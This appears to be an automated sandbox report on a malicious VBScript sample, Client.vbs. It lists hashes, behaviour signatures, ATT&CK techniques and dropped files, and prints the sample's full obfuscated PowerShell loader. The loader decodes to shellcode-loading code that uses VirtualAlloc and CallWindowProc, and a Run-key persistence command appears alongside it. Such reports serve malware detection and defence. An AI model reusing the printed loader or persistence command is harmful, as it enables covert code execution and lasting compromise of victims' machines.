59fbfefc50c8f11efd9765dbef3cf36f2bb1a39edd4273414906017f1c69f7f6

General

Target

Client.vbs
Size

177KB
MD5

bcfb5c05a5695508cae014e0fb254785
SHA1

6cb6d497451b32d393f7b2dc1beb2b0baf80b0d3
SHA256

e443da0d45d95a550c2f2637c8b7f3000aa9fef71840a4deff34333ad51d3c32
SHA512

8a66382d94001e0662f63553d2fdb06335c52e37994425ad980f0c87c0f9b388635b21816dfba6542d694f5f96dc53b1666424c22f5a815c326bc5046e1c08db
SSDEEP

3072:4od0wW0uWMKsiQjL7Ow0z72qo3NFOrvEFbGHTnC66xgZ7/9T/Dv5vwLI2c:bd5uWBsiQXJ0+nOQITCFOr9vSBc

Score

7^/10

persistence

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Saltm = "%TORO% -w 1 $Disordi=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Netvrke;%TORO% ($Disordi)"	ieinstal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

ieinstal.exe

pid process

1708 ieinstal.exe
1708 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1480 powershell.exe
1708 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1480 set thread context of 1708 1480 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1480 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1480 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1480 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ieinstal.exe

pid process

1708 ieinstal.exe

pid	process
1708	ieinstal.exe
1708	ieinstal.exe

pid	process
1480	powershell.exe
1708	ieinstal.exe

description	pid	process	target process
PID 1480 set thread context of 1708	1480	powershell.exe	ieinstal.exe

pid	process
1480	powershell.exe

pid	process
1480	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1480	powershell.exe

pid	process
1708	ieinstal.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 872 wrote to memory of 1480	872	WScript.exe	powershell.exe
PID 872 wrote to memory of 1480	872	WScript.exe	powershell.exe
PID 872 wrote to memory of 1480	872	WScript.exe	powershell.exe
PID 872 wrote to memory of 1480	872	WScript.exe	powershell.exe
PID 1480 wrote to memory of 836	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 836	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 836	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 836	1480	powershell.exe	csc.exe
PID 836 wrote to memory of 2008	836	csc.exe	cvtres.exe
PID 836 wrote to memory of 2008	836	csc.exe	cvtres.exe
PID 836 wrote to memory of 2008	836	csc.exe	cvtres.exe
PID 836 wrote to memory of 2008	836	csc.exe	cvtres.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1708	1480	powershell.exe	ieinstal.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Client.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Derea = """StdATildApodGel-CraTLymyDompSyveAkt Shr-tilTCrayLogpFiseForDCloeSnifGyniFronTeliSkutSlgiMisoilsnReo Epo'FlauPresByoiUninFingUnp RedSGnoyPresEuptFedeudbmHea;ResuSelsBoliNatnAntgLej MobSBrayFissDabtindeafvmflo.KarROpsuKamnAbotMdeihypmPoreKod.ButIWinnsygtMareTanrPuboHalpBraSUdfeLetrNorvPlaikrecUnseSkesSem;asepSkyuBlabSmklRefiCuscSne StasDomtFacaNartTariBracsme MafcdemlParaIdksSrbsPri SdeTWourOplaMetcMonhTeleYojaBiltVreiVra1Dus Aut{Cin[OveDSellSamlFloIHekmSanpFluooxirUnltGyn(Kai`"""SnowElgiEacnMoomEydmCer.gardHewlPollNol`"""Ele)Frn]PorpKuruBydbTrolsekiPercPla NicsScltAaraDretCheiInfcRee UnbeAutxSuptmvheStirUndnTil WamiResnSertCit GummAnuiOzodSlsiJelOVanuAdrtAudRUndesposPuseAfftRes(PorilornMw tPrv NosHOrnahjtmHusaDin)Tal;dis[PenDLislParlAscINepmUnspratoPibrDemtToh(Ady`"""NonkUrgeFolrlasnHeteBeslMaq3Sla2Spa`"""Kan)Fod]DispUveuPenbBorlcasiParcSki EsksRritSamaRaatCurigrfcMis PaneTraxBastTroeInvrPyrnRip PuriPetnRmetFra AutSGrueBertPreULinnStrhPlaaMuhnDisdLanlCureUnrdWilEWasxAlccUdmeHeapOldtAnsiUreoInsnUroFSpriNeilspitSyneRenrBuk(knaiAabnViotIdr JamIDesnOvedFonbArnoOcc)Kir;Rif[LodDcrelDislUngIRasmPripLinoSpyrSamtPav(Amu`"""AllkRefecherPlenKaseDoclLat3Sky2Han`"""Sol)Sup]RkepLabuSchbFurlTitiTwicfin PlesNdutPlaaGentIntiNoncTil FrieDalxStrtcapeChlrTednPla PeniEvonAmbtCed PlaGBasePestEuhTHaviFiacOplkArcCcunoshauRhonKystLiq(Sta)Dyk;Phr[wayDTillHemlTreIGrumConpElioImprSkotHle(Bom`"""CoouMacsSkreDrirFre3Syn2Ung`"""Stt)Grs]DerpPreuKombBrolBuniRodcAbr IncsHngtLimaOvetpodiGalcAnd SkreBjlxKortPryeEftrvannDis SiliLannpaptUdd LeuIHusnspesHoeeKlvrDistDelMSubeZarnIntuTerIYoktTreeSpemSte(SemiExenBartSub AleDSpliTyrsObecTiloSocrMed,ImpiSinnEnmtEss SubfAntePrarAkt,MariIndnSpatPro CoeSDenuShacKla,AneiNonnStatPhy JarAmejrSlooImmmMedaCub)Fis;Gim[ModDPerlbejlVddIAusmHyppDenoSterGhotFas(Muc`"""GuduDissLiceLoarDra3Udr2Per.FjldTamlSkilGal`"""Moz)Apo]GrapHypuBaubAfslNapiChacLre HebsMentAusaSamtTeoiAfvcTea LigeTekxSaltTraeUverRounWid UniIBognSydtUnpPGartEksrFod OmnCAptasuplKatlDatWHaliHepnRygdColoSemwNonPSterRewoGarcUbeWNub(tobIHjenKomtbarPMagtAbsrPil StrPThrrPauoNarsRibeesslPliyEmi5Unm,antianinFlatTra PenPReirRekoUstsrepeEndlNasySan6Cou,PriiCounTiltUdl TigPIrrrGldoRemsSereMytlMonyBer7Hug,MaciblonBistSls elePVesrStooShisGaleReclRidySpu8She,EsciGoonFrotIvy ExgPBoorStioUnrsproeAnslForyUnd9Mez)for;Hip[freDUnslFillYelIDatmPlapBetobesrpretSer(Non`"""TrikendeMetrkodnSmaeBrulFod3Dag2Can`"""Sou)Ind]GrapSkeuSocbErslSiliMascUds VissStetSlaaProtSh iPoscSka TrieUntxPretUdgeThurSaynAnf MosiZoonDistEne OveCleirUdbeUnhaPoltouteAmiDSkiiBehrHypeVolcVistOpsoFrorForyBul(VeniUrinTaftWak CraMTilaTmmnBondMarrOil,ErriPernSittEmu SlaFTerrMamaStovCatrSirsDyn)Ste;Tje[SemDYvelAdalHypIBalmPalpArboDalrSertFli(Tre`"""CalkNodeDihrFalnLyreAablLnm3Ing2Und`"""Ste)Sug]DagpOveuKaibLanlOutihalcFej VissUnqtBrlaDoutfoliCoccApp frieQuaxCartStoeHobrSkunLum RepiBehnPoltNee EmpMKedoLitvOmveShiFFraiWerlMazeTerESkixgen(IroiFionHartjin ConCDefhHypoRadnDisdDiprCon,ForiFranFortPli NonBborahypgImmlJudyLib,BadiPsenGyrtAri UnrKPrioRntmSil)und;Vaa[NavDShrlElelColIPolmJerpStroGrnrFantEmb(Lun`"""ExowCapiSnanPromBromAfs.KondUltlDenlMer`"""Vit)For]lftpThouAfvbTunlSuliBalcOce UnasAnttAmtaTrotConiSupcIde MiseAmbxFyntKlueForrrdvnSmi ProiRulnmertOps RetmDolihaexLooeSenrNilCKoglstaoRhysVekehem(FamiunpnMettTox udsSKeroPolnCeleKoo)Bje;Ano[TryDBiglWralVidIPhomnovpleaoBrerElytCac(Pla`"""DodiGlymGrimAgg3Con2Hom.AlldMeglSanlWea`"""Ski)Iri]KlipHiruRambplalAbbiElscQua lonsFlotSunaUndtUneiRidcfll HypeTirxUnftLeuePrerAflnFor enaiResnVovtFra JudIDramdecmEtaGIndeDritToaVMetiVddrAcotScouAlbaPhyldagKFadeRanySno(YakiLamnTratMan SitSLynvKvleDhadForkDog)Bug;Mil[DepDStalKonlAfpIElemPinpUdboPrerBiotPaa(Yar`"""LdekRoneArbrResnMonePetlPse3Ure2Bas`"""saf)Tjr]PropPlaumisbDislTreiSnecapa TsnsDebtFejaCurtBlaiEtycRam UndetanxUnetSmaeradrPranEdu ExtiAbjnKantSmr DefVMesiBonrKohtBiguKriathelrefARealTunlAbsoDeccrev(SubiCarnSprtAce ForvEve1Und,faniAuknRastFor ProvSik2Kne,OpviWignProtRef HemvMak3Spe,CadiUdlnPretMot penvBud4Sek)For;Sci[RulDKuvlJoklradIRommHirpNoroBlirSvitMon(Pns`"""PrewPoriGranBarsThipForoGenoOvelEsk.InsdMoarInevUnc`"""Glg)Non]KafpAquuTrabRedlpteiHovcLod FrosReftBaaaPentLoviTracSup LaneRykxBrutSokeHomrFornDem KatiBudnContArs ArcDAareVaglprieDamtReveXylPMrkrOmniPrenSlatProePhyrKalCPreoConnTranruteAnscStetPeriDeboAllnNon(KaliTranLyntGer VelTopgiStilUomrDat)Fje;Mon[ExhDunilGenlDelITygmBobpophoHrirBiltCri(Ren`"""PaauThrsSpreAalrBnn3und2Wan`"""Sch)Hie]PsepMamuFajbBirlColiTracTea SunsDdetMalaBedtAesiTrucEnv NedeJouxBlutskaeKasrBasnTus FrdichenUintMon encASubtFortDevaBamcCrahCroTForhhearOpieHalaTegdTipITernUdepQuouGartBro(UnsiSinnStatDis OphGPeaoskakStr,spailatnAvetmon OverFakiphogMenhban,UnbiPacnJamtBal VisTPhleTumkFis)Pre;Hjr[MorDFlolTrilPinITipmovepBogoKasrVogtAfs(For`"""ForuNubsPluePhyrPhe3Pru2Sug`"""Des)Ami]AnspUleuBinbForlPeriBescsle BansBiltTeaaradtTekiFodcTra TileBekxSyntbiteQuirRumnQua DagiDefnMistFor NecISornIgavAceaDemlSeliPubdGodaIndtTheeVirRReneTwicCostEks(OveiPahnAfstTac ReiCEksoretvOkseOve,FabiAttnUnstRen SalVJoraUdblOpkdrekeUng,RrliacenBantUdl ParIStulTruysausAssiSca)ped;Elm}Vis'Xer;Cou`$RedTBagrTilaBndcProhnejeOleaMontForiDru2Uds=Kva`$StreSecnClivIns:MaatTraeTilmEngpAkh Sar+ang Cha`"""duk\SaaGSolrAlgaskrnGna.MildPaaaLantVil`"""Sko;Acr`$AmaLLevnBotkTaxeNidrAhasNeusGuetEureSchrCel Acc=Imp KorGForepibtpri-farCcryoPopnMultCareTitnKrutViv Pri`$OplTdigrAmoaGencUnphDifemacaBlutpauiinv2Fro;Amb`$VanBFlgeUnisInvvCouoUopgAdfrChueStadVil Sel=Opb Col[KapSRepyPresChotPapeKukmMal.PreCRetoImbnflbvForeMinrKontGal]Kni:vas:TelFAccrcaroPramHowBSpuaBacscomePan6Spl4hedSFretIndrEnsiFennBragCle(ski`$MelLNamnSlakcareSuprHunsForsUnbtSameCaprBut)Tut;upd`$AkvTRivrRolaSlacudkhaareBetaNontretiDum3Rea=Egl[GavTVarrTaraHancTrihMuneUnpaDiatPhyiBru1Eve]Ash:Rom:RevVDisiMyxrTrotAnmuBasaBetlBesATellHanlbaioFaccSpo(enk0Bol,Chl1Adm0Men4Ren8Sko5Hel7til6Sar,Dis1Dyn2Tal2Pro8The8Kar,Sen6ver4Eft)Lac;Sub[PanSFamyShrsSkitbabeUdlmPro.TimRRecuFrenSkitBooiMarmInteama.AftIZannAfptDeneGifrannoBespNeuSConeWoorTohvFamiSticMoneSnosSnn.BemMAkvaAugrTiesStrhBrkaDialSiv]Pro:Mon:SinCtapoKrnpLivyBla(Uno`$appBNosekansBedvCyboTangLearBefeSpadCyp,Bnd Hus0Rec,ary Vap Cub`$CanTLobrMaraHazcReshPapeForaUdstSkiiCru3The,Ker Kvr`$OpbBSchestusSonvPreoBergPrerForeSpydLor.UnscSlooKlauNonncaltLil)Dau;Lev[HysTIndrTooaStacFlahGameBloaasctUnliflo1Gra]Uku:Ave:amiCPolaUndlabnlCerWoveiSubnRavdUdboStawSolPBalrAnioSyncuniWVis(Tmr`$AutTCharAdiaRekcUnrhLaceBacaPantMariIag3Dre,Fir Oms0Nos,Bev0Lde,Kop0Udl,Non0Ind)Taf#Kil;""";Function Tracheati4 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Prosely = $Prosely + $HS.Substring($i, 1); } $Prosely;}$symbiosens0 = Tracheati4 'CitIAmpEHeaXSco ';$symbiosens1= Tracheati4 $Derea;& ($symbiosens0) $symbiosens1;"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e_ctlylx.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBBA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCBB9.tmp"
4⤵
PID:2008

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1708

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Gran.dat

Filesize
145KB

MD5
f8aa322d9439db5928769bbe829f3072

SHA1
965728def507bf74d495aaae6a67dec68e5a3355

SHA256
4c1a9a92d1f77a38d54b9fb583d905cbdb81362e3dc79dbec7a6477ae6463d08

SHA512
163db7c96d2739435e65367e18dca23a4c1426061d8df44a4a6b6ddcdd016a613169a6fe91786f46c7f1f3f60422a31bed1d23960418ec2d9a3b145fd87ee0ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCBBA.tmp

Filesize
1KB

MD5
072769f4e8a14096b67d8da431a10c27

SHA1
809668a64e33bf3017dca2b737fcc012b66cb7da

SHA256
9696ae162ff1776107345f8369afc4f3f0f0e1d4a654c8a39853e80cf70f4435

SHA512
d10340c6e120f66e989ba95b5e2880c1d314c3394a7070350005becca3d11650fcfed93f6847887a43705d0d0a5dcb7ded2b44e9600eedb6d4a660f55e9d9779

Download Submit
C:\Users\Admin\AppData\Local\Temp\e_ctlylx.dll

Filesize
4KB

MD5
01ecb9ad51bdc88218c90cb5a3398024

SHA1
80a0086c5240a867ce3810274c9f0310c1f22a05

SHA256
ee519973aa708d3767ac036ff5a89dece34d03a2a963889c90297731c23f9ab6

SHA512
b314c853c3f86d76dc576402537fc6b70a5aa52af228f0c390582ccd788d9dea9a700d3699e6e93bc2545b5c752ca20072719542c4f625bb948c305a31d387ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\e_ctlylx.pdb

Filesize
7KB

MD5
88090836c5876aa23d1cc68c404631e5

SHA1
e58fed0f26f3d041172549e52a67d6efc9144aea

SHA256
a76ea052e188a9b709bba3c0ff7cff4805fd8d73726df746fe1d0e9dda42144f

SHA512
4b4da9c9596d0febf5c145a766d14f1cba446c0fe630bf2f5ac89371f54c88e438aea3947a0f5a460ad4d5d702893b4d542e52917764999dd81d011097840bed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCBB9.tmp

Filesize
652B

MD5
0d7811712cc4b8ee248b36efd24b4b4b

SHA1
10fa297605e4820b3843be2c63d7225c9ac3ea4e

SHA256
a68a83975379539bd368057310dac56763582fbdfdd938e39997143113393309

SHA512
567168ead57dbbf6116dd9c3433938d0a2d15b365df72300e3a7932a35d8d19ae43456a4b155ea95daeee6defccfcace0042375075476a10168c650d161eab01

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e_ctlylx.0.cs

Filesize
1KB

MD5
d4de9651ff0de82d29338c81aa6e5885

SHA1
acec3aa0a3d399927828f4975e5193a2727c7aa8

SHA256
d70e9a0ad03b8c827666c59d74addc16a72244a73ae85fe9a10bf5ea0cf4d5d5

SHA512
458333575625e306dac458b1274d7db85ea023d84f8fc958cdc41a2b65bb5192fa6f581348eb6b20ba1db10c635bbe18d1bc80fe2e4aeccdb76d1971b753a283

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e_ctlylx.cmdline

Filesize
309B

MD5
871ecdd23d6e10c5cd4a56cda581c484

SHA1
958062929e8109c220faabe95f7c1c6939a9c095

SHA256
78a3e7a7230aadd91b8252b595341fb3d95aa89c12d2f509fae0ca1daceba2ee

SHA512
cc43ae8c9124df9416115cee92997decc1f9971dfcde1a950e791e589dbb4c51c0345b83179dceb0d2f70a5a00ad2b3247e0329cc09a9543b70b0895404e9f38

Download Submit
memory/836-58-0x0000000000000000-mapping.dmp

Download
memory/872-54-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp

Filesize
8KB

Download
memory/1480-57-0x0000000074170000-0x000000007471B000-memory.dmp

Filesize
5.7MB

Download
memory/1480-88-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1480-56-0x0000000075B41000-0x0000000075B43000-memory.dmp

Filesize
8KB

Download
memory/1480-55-0x0000000000000000-mapping.dmp

Download
memory/1480-67-0x0000000005AC0000-0x0000000005BC0000-memory.dmp

Filesize
1024KB

Download
memory/1480-68-0x0000000074170000-0x000000007471B000-memory.dmp

Filesize
5.7MB

Download
memory/1480-69-0x0000000005AC0000-0x0000000005BC0000-memory.dmp

Filesize
1024KB

Download
memory/1480-81-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1480-87-0x0000000005AC0000-0x0000000005BC0000-memory.dmp

Filesize
1024KB

Download
memory/1480-75-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1480-74-0x00000000776F0000-0x0000000077899000-memory.dmp

Filesize
1.7MB

Download
memory/1480-76-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1480-82-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1708-72-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1708-77-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1708-83-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1708-84-0x00000000776F0000-0x0000000077899000-memory.dmp

Filesize
1.7MB

Download
memory/1708-86-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1708-85-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1708-73-0x00000000001F0000-mapping.dmp

Download
memory/1708-89-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/1708-90-0x00000000778D0000-0x0000000077A50000-memory.dmp

Filesize
1.5MB

Download
memory/2008-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads